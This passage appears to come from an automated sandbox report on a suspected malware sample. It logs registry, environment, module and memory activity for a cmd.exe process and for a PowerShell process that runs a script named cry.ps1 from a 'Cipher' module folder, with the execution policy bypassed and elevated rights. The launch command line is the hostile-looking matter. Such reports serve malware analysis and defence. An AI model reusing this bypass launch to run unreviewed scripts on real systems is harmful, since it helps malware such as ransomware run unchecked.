| Read | STD_OUTPUT_HANDLE | size = 1, size_out = 1 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 187, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xcbc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0xcc8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x80000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (30)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
10 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
3 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
3 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERPROFILE, result_out = C:\Users\CIiHmnxMn6Ps |
|
3 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 |
Process #6: cmd.exe
49
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | cmd.exe /c cd C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:00:32, Reason: Child Process |
| Unmonitor | End Time: 00:00:32, Reason: Self Terminated |
| Monitor Duration | 00:00:00 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcbc |
| Parent PID | 0xcb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CC0
0x
CC4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00080000 | 0x000cffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000008e0000 | 0x008e0000 | 0x048dffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000048e0000 | 0x048e0000 | 0x048fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000048e0000 | 0x048e0000 | 0x048effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000048f0000 | 0x048f0000 | 0x048f3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004900000 | 0x04900000 | 0x04901fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004900000 | 0x04900000 | 0x04903fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004910000 | 0x04910000 | 0x04923fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004930000 | 0x04930000 | 0x0496ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004970000 | 0x04970000 | 0x04a6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a70000 | 0x04a70000 | 0x04a73fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004a80000 | 0x04a80000 | 0x04a80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004a90000 | 0x04a90000 | 0x04a91fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04aa0000 | 0x04b5dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004b60000 | 0x04b60000 | 0x04b9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bd0000 | 0x04bd0000 | 0x04bdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c20000 | 0x04c20000 | 0x04d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d20000 | 0x04d20000 | 0x04e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005000000 | 0x05000000 | 0x0500ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f3e0000 | 0x7f3e0000 | 0x7f4dffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f4e0000 | 0x7f4e0000 | 0x7f502fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f508000 | 0x7f508000 | 0x7f508fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f509000 | 0x7f509000 | 0x7f50bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f50c000 | 0x7f50c000 | 0x7f50efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f50f000 | 0x7f50f000 | 0x7f50ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 145, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x80000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher |
|
1 |
Process #7: powershell.exe
8502
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\syswow64\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell -ExecutionPolicy ByPass -File C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:00:32, Reason: Child Process |
| Unmonitor | End Time: 00:01:27, Reason: Self Terminated |
| Monitor Duration | 00:00:55 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcc8 |
| Parent PID | 0xcb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CCC
0x
CD0
0x
CD4
0x
CD8
0x
CDC
0x
CE0
0x
CE4
0x
D50
0x
D54
0x
D98
0x
D9C
0x
DF4
0x
DFC
0x
E08
0x
E0C
0x
E14
0x
E2C
0x
E3C
0x
E44
0x
E94
0x
EC4
0x
ED4
0x
F0C
0x
F2C
0x
F40
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| powershell.exe | 0x00200000 | 0x00274fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d90000 | 0x00d90000 | 0x04d8ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004d90000 | 0x04d90000 | 0x04daffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d90000 | 0x04d90000 | 0x04d9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004da0000 | 0x04da0000 | 0x04da3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004db0000 | 0x04db0000 | 0x04db1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004db0000 | 0x04db0000 | 0x04dbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004dc0000 | 0x04dc0000 | 0x04dd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004de0000 | 0x04de0000 | 0x04e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e20000 | 0x04e20000 | 0x04e5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e60000 | 0x04e60000 | 0x04e63fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004e70000 | 0x04e70000 | 0x04e70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004e80000 | 0x04e80000 | 0x04e81fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04e90000 | 0x04f4dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004f50000 | 0x04f50000 | 0x04f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f60000 | 0x04f60000 | 0x04f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fa0000 | 0x04fa0000 | 0x04fdffff | Private Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x04fe0000 | 0x04fe2fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004ff0000 | 0x04ff0000 | 0x04ff0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005000000 | 0x05000000 | 0x05000fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005010000 | 0x05010000 | 0x05010fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005020000 | 0x05020000 | 0x05020fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005030000 | 0x05030000 | 0x05030fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.1.db | 0x05040000 | 0x05043fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x05040000 | 0x05043fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db | 0x05050000 | 0x05062fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000005070000 | 0x05070000 | 0x05070fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000005080000 | 0x05080000 | 0x050bffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x050c0000 | 0x050c3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000050d0000 | 0x050d0000 | 0x051cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000051d0000 | 0x051d0000 | 0x05357fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005360000 | 0x05360000 | 0x054e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000054f0000 | 0x054f0000 | 0x068effff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000068f0000 | 0x068f0000 | 0x0692ffff | Private Memory | rw |
|
|
|
- |
| {3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000035.db | 0x06930000 | 0x0694bfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000006930000 | 0x06930000 | 0x0696ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006970000 | 0x06970000 | 0x069affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000069b0000 | 0x069b0000 | 0x069bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000069c0000 | 0x069c0000 | 0x069fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006a00000 | 0x06a00000 | 0x06a3ffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db | 0x06a40000 | 0x06a82fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000006a90000 | 0x06a90000 | 0x06a93fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000006aa0000 | 0x06aa0000 | 0x06aaffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000006ab0000 | 0x06ab0000 | 0x06abffff | Private Memory | - |
|
|
|
- |
| private_0x0000000006ac0000 | 0x06ac0000 | 0x06acffff | Private Memory | - |
|
|
|
- |
| private_0x0000000006ad0000 | 0x06ad0000 | 0x06adffff | Private Memory | - |
|
|
|
- |
| private_0x0000000006ae0000 | 0x06ae0000 | 0x06aeffff | Private Memory | - |
|
|
|
- |
| private_0x0000000006af0000 | 0x06af0000 | 0x06afffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x06b00000 | 0x06e36fff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db | 0x06e40000 | 0x06ecafff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000006ed0000 | 0x06ed0000 | 0x06edffff | Private Memory | - |
|
|
|
- |
| private_0x0000000006ee0000 | 0x06ee0000 | 0x06ee0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006ef0000 | 0x06ef0000 | 0x06ef0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006f00000 | 0x06f00000 | 0x06f3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006f40000 | 0x06f40000 | 0x06f7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006f80000 | 0x06f80000 | 0x06f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006fa0000 | 0x06fa0000 | 0x06fdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006fe0000 | 0x06fe0000 | 0x0701ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007020000 | 0x07020000 | 0x0702ffff | Private Memory | rw |
|
|
|
- |
| mscorrc.dll | 0x07030000 | 0x07091fff | Memory Mapped File | r |
|
|
|
- |
| winnlsres.dll | 0x070a0000 | 0x070a4fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000070b0000 | 0x070b0000 | 0x070bffff | Private Memory | rw |
|
|
|
- |
| winnlsres.dll.mui | 0x070c0000 | 0x070cffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000070d0000 | 0x070d0000 | 0x070dffff | Private Memory | - |
|
|
|
- |
| private_0x00000000070e0000 | 0x070e0000 | 0x070effff | Private Memory | - |
|
|
|
- |
| private_0x00000000070f0000 | 0x070f0000 | 0x070fffff | Private Memory | rw |
|
|
|
- |
| system.numerics.dll | 0x07100000 | 0x07121fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000007130000 | 0x07130000 | 0x0713ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000007140000 | 0x07140000 | 0x0714ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000007150000 | 0x07150000 | 0x0715ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000007160000 | 0x07160000 | 0x0716ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000007170000 | 0x07170000 | 0x0717ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000007180000 | 0x07180000 | 0x0727ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000007280000 | 0x07280000 | 0x0728ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000007290000 | 0x07290000 | 0x0729ffff | Private Memory | - |
|
|
|
- |
| private_0x00000000072a0000 | 0x072a0000 | 0x072affff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000072b0000 | 0x072b0000 | 0x092affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000092b0000 | 0x092b0000 | 0x092bffff | Private Memory | - |
|
|
|
- |
| private_0x00000000092c0000 | 0x092c0000 | 0x092cffff | Private Memory | - |
|
|
|
- |
| private_0x00000000092d0000 | 0x092d0000 | 0x092dffff | Private Memory | - |
|
|
|
- |
| cry.ps1 | 0x0a680000 | 0x0a680fff | Memory Mapped File | r |
|
|
|
|
| cipher.psm1 | 0x0acd0000 | 0x0acd1fff | Memory Mapped File | r |
|
|
|
|
| cipher.psm1 | 0x0b0e0000 | 0x0b0e1fff | Memory Mapped File | r |
|
|
|
|
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| clrjit.dll | 0x703c0000 | 0x7043cfff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x70440000 | 0x71c2efff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x71c30000 | 0x71cbafff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x71cc0000 | 0x723d2fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x723e0000 | 0x72d8cfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x72d90000 | 0x73fbafff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr120_clr0400.dll | 0x73fc0000 | 0x740b4fff | Memory Mapped File | rwx |
|
|
|
- |
| clr.dll | 0x740c0000 | 0x74767fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74770000 | 0x74777fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x74780000 | 0x747f7fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74800000 | 0x74827fff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x74830000 | 0x7483efff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x74840000 | 0x7485bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x74860000 | 0x74926fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x74930000 | 0x7495efff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x74960000 | 0x7497afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x74980000 | 0x74992fff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x749a0000 | 0x749aafff | Memory Mapped File | rwx |
|
|
|
- |
| bcp47langs.dll | 0x749b0000 | 0x74a00fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74a10000 | 0x74b51fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x74b60000 | 0x74b78fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x74b80000 | 0x74bd8fff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x74be0000 | 0x74bf7fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75220000 | 0x75255fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76820000 | 0x768a1fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x768b0000 | 0x76999fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76c90000 | 0x76d21fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
